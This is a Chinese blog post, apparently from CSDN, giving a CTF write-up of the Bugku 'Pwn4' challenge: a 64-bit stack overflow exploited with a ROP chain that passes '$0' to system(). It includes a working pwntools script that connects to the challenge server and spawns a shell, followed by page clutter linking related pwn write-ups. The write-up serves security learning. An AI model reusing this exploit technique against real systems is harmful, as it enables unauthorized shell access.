Pwn4 - Bugku

最新推荐文章于 2023-08-27 22:40:16 发布
最新推荐文章于 2023-08-27 22:40:16 发布
阅读量381 收藏
点赞数
分类专栏: PWN 文章标签: Bugku pwn shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43921239/article/details/102692610
版权

Pwn4 - Bugku

程序基本情况

程序为64位,保护全关

代码审计

main()函数中的read造成了栈溢出

IDAshift + F12检查有没有可疑字符串,同时检查有没有特殊函数如getshell()

sub_400751()里面出现了调用system()

思路

main()函数存在栈溢出,可调用system()getshell,但是缺少一个参数/bin/sh。在字符串查找中发现$0

补充知识

$0在linux中为shell或shell脚本的名称

在这里插入图片描述

system()会调用fork()产生子进程,由子进程来调用/bin/sh -c string来执行参数string字符串所代表的命令,此命令执行完后随即返回原调用的进程。

所以如果将$0作为system的参数,能达到传入’/bin/sh’一样的效果。

最后需要解决的问题是怎么传参给system()

64位的寄存器传参与32位的不一样,32位的函数调用使用栈传参,64位的函数调用使用寄存器传参。64位传参寄存器分别用rdi、rsi、rdx、rcx、r8、r9来传递参数(参数个数小于7的时候),我们讲 $0的地址存入rdi寄存器(用于第一个参数)中,然后通过rdi寄存器传参,那么我们要知道 $0的地址,rdi的地址以及system函数的地址。

我们利用ROPgadget工具进行查找,得到pop rdi ; ret$0的地址,system的地址直接在IDA中查看

pwn4_6.png

首先先填充缓冲区,大小为0x10,然后覆盖rbp,8个字节,传入pop rdi;ret的地址和$0,将栈中$0的地址弹出,存入rdi作为参数,在传入system地址进行调用。

脚本

from pwn import *

context.log_level = 'debug'

conn = remote('114.116.54.89', 10004)
# conn = process('./pwn4')

pop_rdi = 0x00000000004007d3 
bin_sh = 0x000000000060111f
system = 0x0000000000400570
payload = 'A' * (0x10+8) + p64(pop_rdi) + p64(bin_sh) + p64(system)  

conn.recvuntil('Come on,try to pwn me')
conn.sendline(payload)

conn.interactive()

system这里填入的是plt表中的地址也就是IDA中的_system,存在的问题是本地调试不能成功getshell,但是在服务器端成功getshell,原因不明,麻烦大佬指点(感谢状.jpg)

如果想本地和远程都能成功运行,请将system赋值为0x40075A,也就是sub_400751中的call _system地址

参考

64位汇编参数传递

Bugku-pwn4

SkYe231_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow pwn4
qq_39980610的博客
08-22 647
我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。当启用栈保护后,函数开始执行的时候会先往栈底插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变),如果不合法就停止程序运行 (栈溢出发生)。当程序停止在比对canary的时候我们可以看到栈上的0xc有了一个数据其实就是canary。我们可以分别将断点下在printf函数和程序比对canary的地址。
bugku 里面的五个pwn题wp
qq_36495104的博客
05-08 2133
pwn1 没给二进制文件,直接nc过去就能拿shell,查看flag,flag{6979d853add353c9} pwn2 查看保护,发现什么保护都没开启 ida反编译查看 明显栈溢出,还注意到有后门函数 只需要劫持函数的返回地址到get_shell函数,就可以用拿到flag。使用gdb调试发现,在0x38个字符后就会覆盖返回地址,所以编写脚本拿flag。 exp #pwn2.py from pwn import * #sh=process('./pwn2') sh=remote('11
BugKu做题记录【pwn】(持续更新中)
Assassin
04-06 3176
文章目录repeater1.题目分析2.我的错误思路3.正确思路4.利用代码5.知识点总结 好久不做题了,刚刚开始的签到题就做了三天,感觉水平确实下降得太厉害了,恢复训练~ ** ** repeater 1.题目分析 题目逻辑非常简单,就是read函数输入内容,然后printf输出,经过观察和简单得调试,我们需要注意到几个内容 pinrtf存在格式化字符串漏洞 read长度为0x64,不足以造成栈溢出 经过权限查询发现开启了NX保护,RELRO是部分开启,也就是堆栈不可执行 经过查看,bss段不可执
Bugku——瑞士军刀——pwn
2301_77163106的博客
08-20 339
我们可以很清楚看到有flag文件,进行抓取使用命令cat 相应文件--->cat flag,得到flag。回车并输入查找命令ls(可以了解一些其他的==>接下来我们只要访问他就行了打开kali进入终端。进入终端窗口输入 nc ip 端口。点击进入(也可以点击鼠标右键)题目给我们 nc ip 端口。
Bugku-pwn4详解
Casuall的博客
07-14 4410
这道题来自bugku的第三道pwn题,pwn4。首先进行一些常规检查。 一个64位动态链接的程序,没有开什么保护。 然后用IDA打开,有个危险函数read,可以用来溢出。 shift + F12查看有没有可疑字符串,然后在字符串上按x查看引用他的地方,找到了一个system函数 但是system函数里面的字符串并不是我们想要的'/bin/sh',尝试用ROPgadget去搜索,命令为ROPg...
PWN保护机制以及编译方法
逆向萌新的博客
11-07 2513
PWN保护机制以及编译方法
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwnshellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
xdctf-pwn200-附件资源
03-02
xdctf-pwn200-附件资源
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
bugku-PWN-瑞士军刀解析过程
weixin_46168073的博客
11-14 1917
一、启动场景 点进去,我发现点不进去,搞了半天,花了10个币才搞明白这个不是点的,而是连接的。 这里使用kali。 kali vmwar免安版本: 链接:https://pan.baidu.com/s/1SvbXZlx-0h5gN5__rOp2bg 提取码:1234 二、解题过程 安装kali之后,我们直接开大,然后输入nc 114.67.246.176 13340(端口有变是因为我重启了一次,这里输入,你的端口。) 然后ls,目录下有个flag目录,直接cat flag目录...
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 2016
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
Bugku PWN Easy_int
JEWSWS的博客
04-01 347
【春风不解语,独做狮子吟。】
【awd系列】Bugku S3 AWD排位赛-9 pwn类型
最新发布
weixin_42072280的博客
08-27 1112
Bugku S3 AWD排位赛-9 pwn类型
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 4027
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
记一次bugku pwn题解4月27日
z1r0的博客
04-27 513
记一次bugku pwn题解4月27日 emmmm,远程环境很垃圾(2.19-0ubuntu6.15),笔者patchelf的时候才想起来没有2.19,所以直接用2.23。利用realloc调整了好多次都打不通。。。。。换了四次gadget从0一直测试到realloc+0x30。。。。(没意思,其实可以利用其他方式,比如fsop,当时想着可能马上就可以通了就没有再高兴换了。。 uaf漏洞一枚,还可以edit,直接fastbin attack乱杀。快速写完初始exp发现了一个很ganga的事情,打不通本地和
记一次bugku awd pwn题解4月19日
z1r0的博客
04-19 1344
记一次bugku awd pwn题解4月19日 在昨天还是前天的时候看到今天19:00有人开了一个awd房间,闲得没事就准备今天打着玩玩,结果前一个小时在玩忘记到了时间。。。。。 打开房间的时候发现时间已经过了一会了(XD 先连到端口看一下pwn的题目,很像个堆的题目,靶机上的libc是2.27-1.4的 看到保护什么都没有开的时候就猜到应该是写shellcode了。 这里可以内存泄露 这里可以通过buf来劫持heap_ptr这个指针。 接下来笔者还用到的一个地方就是这个释放功能 攻击思路: 因
bugku-pwn-瑞士军刀 overflow2
m0_57954651的博客
01-13 1339
在klai中使用file命令查看文件类型 可以看到是64位。system函数的地址是0×40043F。使用IDA 64 Pro打开文件 查看主函数。利用Kali连接 ls查看。给了个nc和文件 下载。
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值